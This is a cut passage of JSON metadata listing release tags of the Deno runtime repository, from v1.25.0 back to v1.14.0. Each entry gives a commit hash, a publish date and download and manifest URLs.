"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_i